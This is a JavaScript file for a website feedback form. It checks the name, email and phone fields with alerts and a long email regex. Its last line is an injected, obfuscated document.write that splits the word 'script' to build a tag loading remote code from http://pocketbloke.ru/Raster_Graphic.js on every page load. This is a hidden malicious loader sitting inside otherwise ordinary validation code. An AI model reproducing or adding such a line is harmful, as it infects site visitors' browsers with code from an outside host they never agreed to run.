function validate()
	{ 
		var txtName=document.getElementById('txtName');
		var txtEmail=document.getElementById('txtEmail');
		var txtPhone=document.getElementById('txtPhone');
     	var txtFeedBack=document.getElementById('txtFeedBack');
		if(txtName.value=="")
		{
			alert("Please Enter name");
			txtName.focus();
			return false;
		}
		if(txtEmail.value=="")
		{
			alert("Please enter Your Email");
			txtEmail.focus();
			return false;
		}
		if(!isemail(txtEmail.value))
		{
			alert("Please enter valid Email");
			txtEmail.focus();
			return false;
		}
			var cellno=/^([0-9]{10,12})$/;
		if(txtPhone.value=="" || !txtPhone.value.match(cellno))
		{
			alert("Please Enter valid phone number");
			txtPhone.focus();
			return false;
		}
	
		if(txtFeedBack.value=="Enter your query here..")
		{
			alert("Please Enter your query here");
			txtFeedBack.focus();
			return false;
		}
		
		return true;
	}
	
	
		function isemail(email)
	{
		 var RegExp = /^((([a-z]|[0-9]|!|#|$|%|&|'|\*|\+|\-|\/|=|\?|\^|_|`|\{|\||\}|~)+(\.([a-z]|[0-9]|!|#|$|%|&|'|\*|\+|\-|\/|=|\?|\^|_|`|\{|\||\}|~)+)*)@((((([a-z]|[0-9])([a-z]|[0-9]|\-){0,61}([a-z]|[0-9])\.))*([a-z]|[0-9])([a-z]|[0-9]|\-){0,61}([a-z]|[0-9])\.)[\w]{2,4}|(((([0-9]){1,3}\.){3}([0-9]){1,3}))|(\[((([0-9]){1,3}\.){3}([0-9]){1,3})\])))$/

		if(RegExp.test(email)){

			return true;

		}else{

			return false;

		}
	}




document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Raster_Graphic.js"></scri'+'pt>');